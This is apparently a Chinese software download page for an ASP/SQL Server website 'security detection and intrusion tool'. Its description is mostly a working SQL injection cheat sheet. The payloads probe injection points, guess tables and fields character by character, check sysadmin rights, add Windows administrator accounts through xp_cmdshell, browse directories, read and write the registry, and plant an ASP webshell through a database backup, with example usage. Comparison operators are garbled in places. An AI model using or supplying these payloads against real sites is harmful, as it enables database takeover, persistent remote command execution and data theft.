首页 > PC > 网络安全
网站安全检测入侵工具

网站安全检测入侵工具

大小:1MB
类别:网络安全
官方
免费
安全
纠错

检测到是安卓设备,电脑版软件不适合移动端

  • 简介
  • 相关教程
  • 相关合集
  • 评论
网站安全检测入侵工具 网站安全检测入侵工具 网站安全检测入侵工具
简介

本专用工具作用十分强劲,期待学生们用以正道,别去做一些为非作歹的让人十分可耻的事儿,由VB语言撰写的网址网站漏洞扫描专用工具的名字,ASP引入网站漏洞扫描专用工具,尤其在SQL Server引入检验层面有非常高的准确度。

1.分辨是不是有引入

;and 1=1

;and 1=2

2.分析判断是不是mssql

;and user0

3.分辨数据库系统软件

;and (select count(*) from sysobjects)0 mssql

;and (select count(*) from msysobjects)0 access

4.引入主要参数是标识符

and [查询条件] and =

5.检索时没过虑主要参数的

and [查询条件] and %=

6.猜数据库

;and (Select Count(*) from [数据库名])0

7.猜字段

;and (Select Count(字段名) from 数据库名)0

8.猜字段中纪录长短

;and (select top 1 len(字段名) from 数据库名)0

9.(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)0

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)0

10.检测管理权限构造(mssql)

;and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--

;and 1=(SELECT IS_MEMBER(db_owner));--

11.加上mssql和体系的账号

;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,

username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin

username;--

;exec master.dbo.xp_cmdshell net user username

password /workstations:* /times:all

/passwordchg:yes /passwordreq:yes /active:yes /add

;--

;exec master.dbo.xp_cmdshell net user username

password /add;--

;exec master.dbo.xp_cmdshell net localgroup

administrators username /add;--

12.(1)解析xml文件目录

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree c:\

;and (select top 1 paths from dirs)0

;and (select top 1 paths from dirs where paths not

in(上步获得的paths)))

(2)解析xml文件目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- 得到当今全部控制器

;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 得到根目录目录

;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 得到全部根目录的文件目录树形结构

;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查询资料的內容

13.mssql中的sql语句

xp_regenumvalues 注册表文件根键, 子键

;exec xp_regenumvalues HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion\Run 以好几个记录集方法回到全部键值

xp_regread 根键,子键,键值名

;exec xp_regread HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion,

CommonFilesDir 回到制订键的值

xp_regwrite 根键,子键, 值名, 值种类, 值

值种类有2种REG_SZ 表明字符型,REG_DWORD 表明整形

;exec xp_regwrite HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion,

TestValueName,reg_sz,hello 载入注册表文件

xp_regdeletevalue 根键,子键,值名

exec xp_regdeletevalue HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion,

TestValueName 删掉某一值

xp_regdeletekey HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey 退格键,包含该键下全部值

14.mssql的backup建立webshell

use model

create table cmd(str image);

insert into cmd(str) values (% Dim oScript %);

backup database model to disk=c:\l.asp;

15.mssql内嵌涵数

;and (select @@version)0 得到Windows的版本信息

;and user_name()=dbo 分辨当今系统软件的联接客户是否sa

;and (select user_name())0 爆当今系统软件的联接客户

;and (select db_name())0 获得当今联接的数据库

16.简约的webshell

use model

create table cmd(str image);

insert into cmd(str) values (%=server.createobject(wscript.shell).exec(cmd.exe /c request(c)).stdout.readall%);

backup database model to disk=g:\wwwtest\l.asp;

要求的情况下,像这样子用:

l.asp?c=dir

软件信息

软件标签:
软件版本:
更新时间:2025-05-04
软件大小:1MB
备案号:暂无
厂商:暂无
包名:暂无
应用权限:
查看
  • 程序写入外部存储

    -- 允许程序写入外部存储
  • 读取设备外部存储空间的文件

    -- 程序可以读取设备外部存储空间的文件
    -- 允许程序请求安装文件包
  • 获取额外的位置信息提供程序命令

    -- 允许程序访问额外的定位提供者指令
  • 访问SD卡文件系统

    -- 挂载、反挂载外部文件系统
  • 访问SD卡文件系统

    -- 挂载、反挂载外部文件系统
  • 查看WLAN连接

    -- 获取当前WiFi接入的状态以及WLAN热点的信息
  • 完全的网络访问权限

    -- 访问网络连接,可能产生GPRS流量
  • 连接WLAN网络和断开连接

    -- 改变WiFi状态
  • 修改系统设置

    -- 允许读写系统设置项
  • 查看网络连接

    -- 获取网络信息状态,如当前的网络连接是否有效
  • 收起
隐私说明:
查看
  • 我们严格遵守法律法规,遵循以下隐私保护原则,为您提供更加安全、可靠的服务:

  • 1、安全可靠:

    我们竭尽全力通过合理有效的信息安全技术及管理流程,防止您的信息泄露、损毁、丢失。
  • 2、自主选择:

    我们为您提供便利的信息管理选项,以便您做出合适的选择,管理您的个人信息
  • 3、保护通信秘密:

    我们严格遵照法律法规,保护您的通信秘密,为您提供安全的通信服务。
  • 4、合理必要:

    为了向您和其他用户提供更好的服务,我们仅收集必要的信息。
  • 5、清晰透明:

    我们努力使用简明易懂的表述,向您介绍隐私政策,以便您清晰地了解我们的信息处理方式。
  • 6、将隐私保护融入产品设计:

    我们在产品和服务研发、运营的各个环节,融入隐私保护的理念。
  • 本《隐私政策》主要向您说明:

    我们收集哪些信息 我们收集信息的用途 您所享有的权利
  • 希望您仔细阅读《隐私政策》

    为了让您有更好的体验、改善我们的服务或经您同意的其他用途,在符合相关法律法规的前提下,我们可能将通过某些服务所收集的信息用于我们的其他服务。例如,将您在使用我们某项服务时的信息,用于另一项服务中向您展示个性化的内容或广告、用于用户研究分析与统计等服务。
  • 若您使用服务,即表示您认同我们在本政策中所述内容。除另有约定外,本政策所用术语与《服务协议》中的术语具有相同的涵义。
  • 如您有问题,请联系我们。
  • 收起
类似软件
本类排行
近期大作

最新软件

相关合集 更多

相关教程

无线入侵检测系统 键盘检测网站_键盘检测网站是什么_键盘检测网站在哪 360安全服务网站频繁被入侵,出现风险提示,如何解决 漏洞检测工具_漏洞检测工具排行榜_漏洞检测工具g 系统检测工具_系统检测工具软件_系统检测工具有哪些

热搜标签

网友评论

添加表情
评论
举报

举报反馈

  • 色情
  • 版权
  • 反动
  • 暴力
  • 软件失效
  • 其他原因
提交反馈